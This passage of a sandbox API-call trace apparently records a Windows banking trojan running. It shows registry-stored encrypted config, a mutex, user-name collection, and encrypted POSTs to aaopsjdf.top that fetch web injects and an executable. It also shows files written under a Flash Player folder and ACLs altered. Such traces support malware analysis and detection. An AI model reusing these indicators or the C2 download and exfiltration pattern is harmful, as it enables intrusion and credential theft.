bInitialOwner=0, lpName="ABC6B5B774FF9FD7F54EC277098C64EE") returned 0x324 [0318.318] WaitForSingleObject (hHandle=0x324, dwMilliseconds=0xffffffff) returned 0x0 [0318.318] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x271e220 | out: phkResult=0x271e220*=0x444) returned 0x0 [0318.318] RegQueryValueExW (in: hKey=0x444, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x271e24c, lpData=0x0, lpcbData=0x271e234*=0x0 | out: lpType=0x271e24c*=0x3, lpData=0x0, lpcbData=0x271e234*=0x6f0) returned 0x0 [0318.318] RegQueryValueExW (in: hKey=0x444, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x271e24c, lpData=0x238f968, lpcbData=0x271e234*=0x6f0 | out: lpType=0x271e24c*=0x3, lpData=0x238f968*, lpcbData=0x271e234*=0x6f0) returned 0x0 [0318.318] RegCloseKey (hKey=0x444) returned 0x0 [0318.318] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x271e234, lpdwDisposition=0x0 | out: phkResult=0x271e234*=0x444, lpdwDisposition=0x0) returned 0x0 [0318.318] RegSetValueExW (in: hKey=0x444, lpValueName="Baywkivyl", Reserved=0x0, dwType=0x3, lpData=0x38f0048*, cbData=0x6f0 | out: lpData=0x38f0048*) returned 0x0 [0318.318] RegCloseKey (hKey=0x444) returned 0x0 [0318.318] CreateMutexW (lpMutexAttributes=0x877e4, bInitialOwner=0, lpName="ABC6B5B774FF9FD7F54EC277098C64EE") returned 0x324 [0318.319] WaitForSingleObject (hHandle=0x324, dwMilliseconds=0xffffffff) returned 0x0 [0318.319] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x271e958 | out: phkResult=0x271e958*=0x444) returned 0x0 [0318.319] RegQueryValueExW (in: hKey=0x444, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x271e984, lpData=0x0, lpcbData=0x271e96c*=0x0 | out: lpType=0x271e984*=0x3, lpData=0x0, lpcbData=0x271e96c*=0x6f0) returned 0x0 [0318.319] RegQueryValueExW (in: hKey=0x444, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x271e984, lpData=0x238f968, lpcbData=0x271e96c*=0x6f0 | out: lpType=0x271e984*=0x3, lpData=0x238f968*, lpcbData=0x271e96c*=0x6f0) returned 0x0 [0318.319] RegCloseKey (hKey=0x444) returned 0x0 [0318.319] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x271e96c, lpdwDisposition=0x0 | out: phkResult=0x271e96c*=0x444, lpdwDisposition=0x0) returned 0x0 [0318.319] RegSetValueExW (in: hKey=0x444, lpValueName="Baywkivyl", Reserved=0x0, dwType=0x3, lpData=0x38f0048*, cbData=0x6f0 | out: lpData=0x38f0048*) returned 0x0 [0318.319] RegCloseKey (hKey=0x444) returned 0x0 [0318.319] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x271f47c | out: phkResult=0x271f47c*=0x324) returned 0x0 [0318.319] RegQueryValueExW (in: hKey=0x324, lpValueName="Omegovna", lpReserved=0x0, lpType=0x271f4a8, lpData=0x0, lpcbData=0x271f490*=0x0 | out: lpType=0x271f4a8*=0x3, lpData=0x0, lpcbData=0x271f490*=0x6f0) returned 0x0 [0318.319] RegQueryValueExW (in: hKey=0x324, lpValueName="Omegovna", lpReserved=0x0, lpType=0x271f4a8, lpData=0x238f968, lpcbData=0x271f490*=0x6f0 | out: lpType=0x271f4a8*=0x3, lpData=0x238f968*, lpcbData=0x271f490*=0x6f0) returned 0x0 [0318.319] RegCloseKey (hKey=0x324) returned 0x0 [0318.319] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x271ea94 | out: phkResult=0x271ea94*=0x324) returned 0x0 [0318.319] RegQueryValueExW (in: hKey=0x324, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x271eac0, lpData=0x0, lpcbData=0x271eaa8*=0x0 | out: lpType=0x271eac0*=0x3, lpData=0x0, lpcbData=0x271eaa8*=0x6f0) returned 0x0 [0318.320] RegQueryValueExW (in: hKey=0x324, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x271eac0, lpData=0x238f968, lpcbData=0x271eaa8*=0x6f0 | out: lpType=0x271eac0*=0x3, lpData=0x238f968*, lpcbData=0x271eaa8*=0x6f0) returned 0x0 [0318.320] RegCloseKey (hKey=0x324) returned 0x0 [0318.320] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/webinjects_new.dat", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x271f428 | out: lpUrlComponents=0x271f428) returned 1 [0318.320] GetSystemTime (in: lpSystemTime=0x271f0d8 | out: lpSystemTime=0x271f0d8*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0x12, wMinute=0x38, wSecond=0x31, wMilliseconds=0xaf)) [0318.320] SystemTimeToFileTime (in: lpSystemTime=0x271f0d8, lpFileTime=0x271f0e8 | out: lpFileTime=0x271f0e8) returned 1 [0318.320] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x271f160, nSize=0x271f10c | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x271f10c) returned 0x1 [0318.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0318.320] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x271f05c | out: phkResult=0x271f05c*=0x324) returned 0x0 [0318.320] RegQueryValueExW (in: hKey=0x324, lpValueName="Omegovna", lpReserved=0x0, lpType=0x271f088, lpData=0x0, lpcbData=0x271f070*=0x0 | out: lpType=0x271f088*=0x3, lpData=0x0, lpcbData=0x271f070*=0x6f0) returned 0x0 [0318.320] RegQueryValueExW (in: hKey=0x324, lpValueName="Omegovna", lpReserved=0x0, lpType=0x271f088, lpData=0x238f968, lpcbData=0x271f070*=0x6f0 | out: lpType=0x271f088*=0x3, lpData=0x238f968*, lpcbData=0x271f070*=0x6f0) returned 0x0 [0318.320] RegCloseKey (hKey=0x324) returned 0x0 [0318.320] wvnsprintfW (in: pszDest=0x271f114, cchDest=10, pszFmt="%u.%u.%u", arglist=0x271f0ec | out: pszDest="2.6.1") returned 5 [0318.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2.6.1", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0318.320] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x271f2ce, cbEncoded=0x125, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x271f030, pcbStructInfo=0x271f014 | out: pvStructInfo=0x271f030, pcbStructInfo=0x271f014) returned 1 [0318.320] CryptImportPublicKeyInfo (in: hCryptProv=0x3de630, dwCertEncodingType=0x1, pInfo=0x4240a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x4240d0*, PublicKey.cbData=0x10d, PublicKey.pbData=0x4240d8*, PublicKey.cUnusedBits=0x0), phKey=0x271f020 | out: phKey=0x271f020*=0x45b898) returned 1 [0318.320] LocalFree (hMem=0x4240a0) returned 0x0 [0318.320] wvnsprintfA (in: pszDest=0x235c448, cchDest=21, pszFmt="%d", arglist=0x271ef34 | out: pszDest="1515610609") returned 10 [0318.321] CryptEncrypt (in: hKey=0x45b898, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x271ee80*=0x20, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x271ee80*=0x100) returned 1 [0318.321] CryptEncrypt (in: hKey=0x45b898, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2350db0*, pdwDataLen=0x271ee94*=0x20, dwBufLen=0x100 | out: pbData=0x2350db0*, pdwDataLen=0x271ee94*=0x100) returned 1 [0318.321] CryptDestroyKey (hKey=0x45b898) returned 1 [0318.321] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/webinjects_new.dat", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x271ef90 | out: lpUrlComponents=0x271ef90) returned 1 [0318.321] wvnsprintfA (in: pszDest=0x2350db0, cchDest=516, pszFmt="%s%s", arglist=0x271efc8 | out: pszDest="https://aaopsjdf.top/yMGvio/o0sO/J9/p/TDdCp0pD/f/3Q2nAw/") returned 56 [0318.321] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/yMGvio/o0sO/J9/p/TDdCp0pD/f/3Q2nAw/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x271ef88 | out: lpUrlComponents=0x271ef88) returned 1 [0318.321] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0318.321] InternetSetOptionA (hInternet=0xcc0008, dwOption=0x2, lpBuffer=0x84024, dwBufferLength=0x4) returned 1 [0318.321] InternetSetOptionA (hInternet=0xcc0008, dwOption=0x6, lpBuffer=0x8402c, dwBufferLength=0x4) returned 1 [0318.321] InternetSetOptionA (hInternet=0xcc0008, dwOption=0x5, lpBuffer=0x84034, dwBufferLength=0x4) returned 1 [0318.321] InternetConnectA (hInternet=0xcc0008, lpszServerName="aaopsjdf.top", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0014 [0318.321] HttpOpenRequestA (hConnect=0xcc0014, lpszVerb="POST", lpszObjectName="/yMGvio/o0sO/J9/p/TDdCp0pD/f/3Q2nAw/", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x84000*="text/html", dwFlags=0x8484f700, dwContext=0x0) returned 0xcc0020 [0318.321] HttpSendRequestA (hRequest=0xcc0020, lpszHeaders="Connection: close\r\n\x18P\x999\x02\x01", dwHeadersLength=0x13, lpOptional=0x38f0048, dwOptionalLength=0x2c0) returned 0 [0318.525] InternetQueryOptionA (in: hInternet=0xcc0020, dwOption=0x1f, lpBuffer=0x271eeac, lpdwBufferLength=0x271eeb0 | out: lpBuffer=0x271eeac, lpdwBufferLength=0x271eeb0) returned 1 [0318.525] InternetSetOptionA (hInternet=0xcc0020, dwOption=0x1f, lpBuffer=0x271eeac, dwBufferLength=0x4) returned 1 [0318.525] HttpSendRequestA (in: hRequest=0xcc0020, lpszHeaders="Connection: close\r\n\x18P\x999\x02\x01", dwHeadersLength=0x13, lpOptional=0x38f0048*, dwOptionalLength=0x2c0 | out: lpOptional=0x38f0048*) returned 1 [0318.995] HttpQueryInfoA (in: hRequest=0xcc0020, dwInfoLevel=0x20000013, lpBuffer=0x271eeac, lpdwBufferLength=0x271eeb0, lpdwIndex=0x0 | out: lpBuffer=0x271eeac*, lpdwBufferLength=0x271eeb0*=0x4, lpdwIndex=0x0) returned 1 [0318.995] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0318.995] InternetReadFile (in: hFile=0xcc0020, lpBuffer=0x2399950, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x271efc0 | out: lpBuffer=0x2399950*, lpdwNumberOfBytesRead=0x271efc0*=0xc98) returned 1 [0318.996] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0318.996] InternetReadFile (in: hFile=0xcc0020, lpBuffer=0x239a5e8, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x271efc0 | out: lpBuffer=0x239a5e8*, lpdwNumberOfBytesRead=0x271efc0*=0x0) returned 1 [0318.997] InternetCloseHandle (hInternet=0xcc0020) returned 1 [0318.998] InternetQueryOptionA (in: hInternet=0xcc0014, dwOption=0x15, lpBuffer=0x271efbc, lpdwBufferLength=0x271efb8 | out: lpBuffer=0x271efbc, lpdwBufferLength=0x271efb8) returned 1 [0318.998] InternetCloseHandle (hInternet=0xcc0014) returned 1 [0318.998] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0318.998] CryptImportKey (in: hProv=0x3de630, pbData=0x2350db0, dwDataLen=0x120, hPubKey=0x0, dwFlags=0x0, phKey=0x271f45c | out: phKey=0x271f45c*=0x45b898) returned 1 [0318.998] CryptCreateHash (in: hProv=0x3de630, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x271f450 | out: phHash=0x271f450) returned 1 [0318.998] CryptHashData (hHash=0x45b958, pbData=0x239a5f0, dwDataLen=0x2d0, dwFlags=0x0) returned 1 [0318.998] CryptVerifySignatureW (hHash=0x45b958, pbSignature=0x38f0db8, dwSigLen=0x100, hPubKey=0x45b898, szDescription=0x0, dwFlags=0x0) returned 1 [0318.998] CryptDestroyHash (hHash=0x45b958) returned 1 [0318.998] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\microsoft onedrive.rig"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5b0 [0318.999] WriteFile (in: hFile=0x5b0, lpBuffer=0x239a5f0*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x271f43c, lpOverlapped=0x0 | out: lpBuffer=0x239a5f0*, lpNumberOfBytesWritten=0x271f43c*=0x2d0, lpOverlapped=0x0) returned 1 [0318.999] CloseHandle (hObject=0x5b0) returned 1 [0318.999] GetCurrentThread () returned 0xfffffffe [0318.999] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x271f414 | out: TokenHandle=0x271f414*=0x0) returned 0 [0318.999] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x271f414 | out: TokenHandle=0x271f414*=0x5b0) returned 1 [0318.999] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x271f408 | out: lpLuid=0x271f408*(LowPart=0x8, HighPart=0)) returned 1 [0319.000] AdjustTokenPrivileges (in: TokenHandle=0x5b0, DisableAllPrivileges=0, NewState=0x271f404*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0319.000] GetLastError () returned 0x514 [0319.000] CloseHandle (hObject=0x5b0) returned 1 [0319.000] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0319.001] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x333e660, lpbSaclPresent=0x271f42c, pSacl=0x271f438, lpbSaclDefaulted=0x271f430 | out: lpbSaclPresent=0x271f42c, pSacl=0x271f438, lpbSaclDefaulted=0x271f430) returned 1 [0319.001] SetNamedSecurityInfoW () returned 0x0 [0319.001] LocalFree (hMem=0x333e660) returned 0x0 [0319.001] GetNamedSecurityInfoW () returned 0x0 [0319.001] AllocateAndInitializeSid (in: pIdentifierAuthority=0x271f3f8, nSubAuthorityCount=0x2, nSubAuthority0=0x2, nSubAuthority1=0x1, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x271f408 | out: pSid=0x271f408*=0x3ec6b0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0xf), SubAuthority=([0]=0x2, [1]=0x0))) returned 1 [0319.001] SetEntriesInAclW () returned 0x0 [0319.001] SetNamedSecurityInfoW () returned 0x0 [0319.002] LocalFree (hMem=0x42a210) returned 0x0 [0319.002] LocalFree (hMem=0x44a108) returned 0x0 [0319.002] CryptDestroyKey (hKey=0x45b898) returned 1 [0319.002] CreateMutexW (lpMutexAttributes=0x877e4, bInitialOwner=0, lpName="ABC6B5B774FF9FD7F54EC277098C64EE") returned 0x5b0 [0319.002] WaitForSingleObject (hHandle=0x5b0, dwMilliseconds=0xffffffff) returned 0x0 [0319.002] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x271ea80 | out: phkResult=0x271ea80*=0x444) returned 0x0 [0319.002] RegQueryValueExW (in: hKey=0x444, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x271eaac, lpData=0x0, lpcbData=0x271ea94*=0x0 | out: lpType=0x271eaac*=0x3, lpData=0x0, lpcbData=0x271ea94*=0x6f0) returned 0x0 [0319.002] RegQueryValueExW (in: hKey=0x444, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x271eaac, lpData=0x238f968, lpcbData=0x271ea94*=0x6f0 | out: lpType=0x271eaac*=0x3, lpData=0x238f968*, lpcbData=0x271ea94*=0x6f0) returned 0x0 [0319.002] RegCloseKey (hKey=0x444) returned 0x0 [0319.002] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x271ea94, lpdwDisposition=0x0 | out: phkResult=0x271ea94*=0x444, lpdwDisposition=0x0) returned 0x0 [0319.002] RegSetValueExW (in: hKey=0x444, lpValueName="Baywkivyl", Reserved=0x0, dwType=0x3, lpData=0x38f0718*, cbData=0x6f0 | out: lpData=0x38f0718*) returned 0x0 [0319.002] RegCloseKey (hKey=0x444) returned 0x0 Thread: id = 212 os_tid = 0x30c [0312.962] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28ff914 | out: phkResult=0x28ff914*=0x108) returned 0x0 [0312.962] RegQueryValueExW (in: hKey=0x108, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff940, lpData=0x0, lpcbData=0x28ff928*=0x0 | out: lpType=0x28ff940*=0x0, lpData=0x0, lpcbData=0x28ff928*=0x0) returned 0x2 [0312.962] RegCloseKey (hKey=0x108) returned 0x0 [0312.962] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0313.065] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x28ff918 | out: lpFileSize=0x28ff918*=1776) returned 1 [0313.065] VirtualAlloc (lpAddress=0x0, dwSize=0x6f0, flAllocationType=0x3000, flProtect=0x4) returned 0x120000 [0313.065] ReadFile (in: hFile=0x18c, lpBuffer=0x120000, nNumberOfBytesToRead=0x6f0, lpNumberOfBytesRead=0x28ff928, lpOverlapped=0x0 | out: lpBuffer=0x120000*, lpNumberOfBytesRead=0x28ff928*=0x6f0, lpOverlapped=0x0) returned 1 [0313.065] VirtualFree (lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0313.066] CloseHandle (hObject=0x18c) returned 1 [0313.068] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0313.068] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28fef8c | out: phkResult=0x28fef8c*=0x18c) returned 0x0 [0313.068] RegQueryValueExW (in: hKey=0x18c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fefb8, lpData=0x0, lpcbData=0x28fefa0*=0x0 | out: lpType=0x28fefb8*=0x3, lpData=0x0, lpcbData=0x28fefa0*=0x6f0) returned 0x0 [0313.068] RegQueryValueExW (in: hKey=0x18c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fefb8, lpData=0x235cb58, lpcbData=0x28fefa0*=0x6f0 | out: lpType=0x28fefb8*=0x3, lpData=0x235cb58*, lpcbData=0x28fefa0*=0x6f0) returned 0x0 [0313.068] RegCloseKey (hKey=0x18c) returned 0x0 [0313.068] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28ff024 | out: phkResult=0x28ff024*=0x18c) returned 0x0 [0313.068] RegQueryValueExW (in: hKey=0x18c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff050, lpData=0x0, lpcbData=0x28ff038*=0x0 | out: lpType=0x28ff050*=0x0, lpData=0x0, lpcbData=0x28ff038*=0x0) returned 0x2 [0313.068] RegCloseKey (hKey=0x18c) returned 0x0 [0313.068] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0313.068] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x28ff028 | out: lpFileSize=0x28ff028*=1776) returned 1 [0313.068] VirtualAlloc (lpAddress=0x0, dwSize=0x6f0, flAllocationType=0x3000, flProtect=0x4) returned 0x120000 [0313.068] ReadFile (in: hFile=0x18c, lpBuffer=0x120000, nNumberOfBytesToRead=0x6f0, lpNumberOfBytesRead=0x28ff038, lpOverlapped=0x0 | out: lpBuffer=0x120000*, lpNumberOfBytesRead=0x28ff038*=0x6f0, lpOverlapped=0x0) returned 1 [0313.068] VirtualFree (lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0313.069] CloseHandle (hObject=0x18c) returned 1 [0313.071] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/1qesyozananrivoxityof.exe", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x28ff038 | out: lpUrlComponents=0x28ff038) returned 1 [0313.217] GetSystemTime (in: lpSystemTime=0x28fece8 | out: lpSystemTime=0x28fece8*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0x12, wMinute=0x38, wSecond=0x2c, wMilliseconds=0x163)) [0313.217] SystemTimeToFileTime (in: lpSystemTime=0x28fece8, lpFileTime=0x28fecf8 | out: lpFileTime=0x28fecf8) returned 1 [0313.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0313.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x235d450, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0313.217] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x28fed70, nSize=0x28fed1c | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x28fed1c) returned 0x1 [0313.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0313.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x2350688, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YKYD69Q\\aETAdzjz", lpUsedDefaultChar=0x0) returned 16 [0313.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DA064951B33C749DEEA4F9B0A440E075", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0313.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DA064951B33C749DEEA4F9B0A440E075", cchWideChar=32, lpMultiByteStr=0x235d678, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DA064951B33C749DEEA4F9B0A440E075", lpUsedDefaultChar=0x0) returned 32 [0313.218] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28fec6c | out: phkResult=0x28fec6c*=0x1fc) returned 0x0 [0313.218] RegQueryValueExW (in: hKey=0x1fc, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28fec98, lpData=0x0, lpcbData=0x28fec80*=0x0 | out: lpType=0x28fec98*=0x0, lpData=0x0, lpcbData=0x28fec80*=0x0) returned 0x2 [0313.218] RegCloseKey (hKey=0x1fc) returned 0x0 [0313.218] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0313.218] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x28fec70 | out: lpFileSize=0x28fec70*=1776) returned 1 [0313.218] VirtualAlloc (lpAddress=0x0, dwSize=0x6f0, flAllocationType=0x3000, flProtect=0x4) returned 0x150000 [0313.219] ReadFile (in: hFile=0x1fc, lpBuffer=0x150000, nNumberOfBytesToRead=0x6f0, lpNumberOfBytesRead=0x28fec80, lpOverlapped=0x0 | out: lpBuffer=0x150000*, lpNumberOfBytesRead=0x28fec80*=0x6f0, lpOverlapped=0x0) returned 1 [0313.219] VirtualFree (lpAddress=0x150000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0313.219] CloseHandle (hObject=0x1fc) returned 1 [0313.220] wvnsprintfW (in: pszDest=0x28fed24, cchDest=10, pszFmt="%u.%u.%u", arglist=0x28fecfc | out: pszDest="2.6.1") returned 5 [0313.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2.6.1", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0313.220] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x28feede, cbEncoded=0x125, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x28fec40, pcbStructInfo=0x28fec24 | out: pvStructInfo=0x28fec40, pcbStructInfo=0x28fec24) returned 1 [0313.225] CryptImportPublicKeyInfo (in: hCryptProv=0x3de630, dwCertEncodingType=0x1, pInfo=0x3efcd0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3efd00*, PublicKey.cbData=0x10d, PublicKey.pbData=0x3efd08*, PublicKey.cUnusedBits=0x0), phKey=0x28fec30 | out: phKey=0x28fec30*=0x3e9c50) returned 1 [0313.226] LocalFree 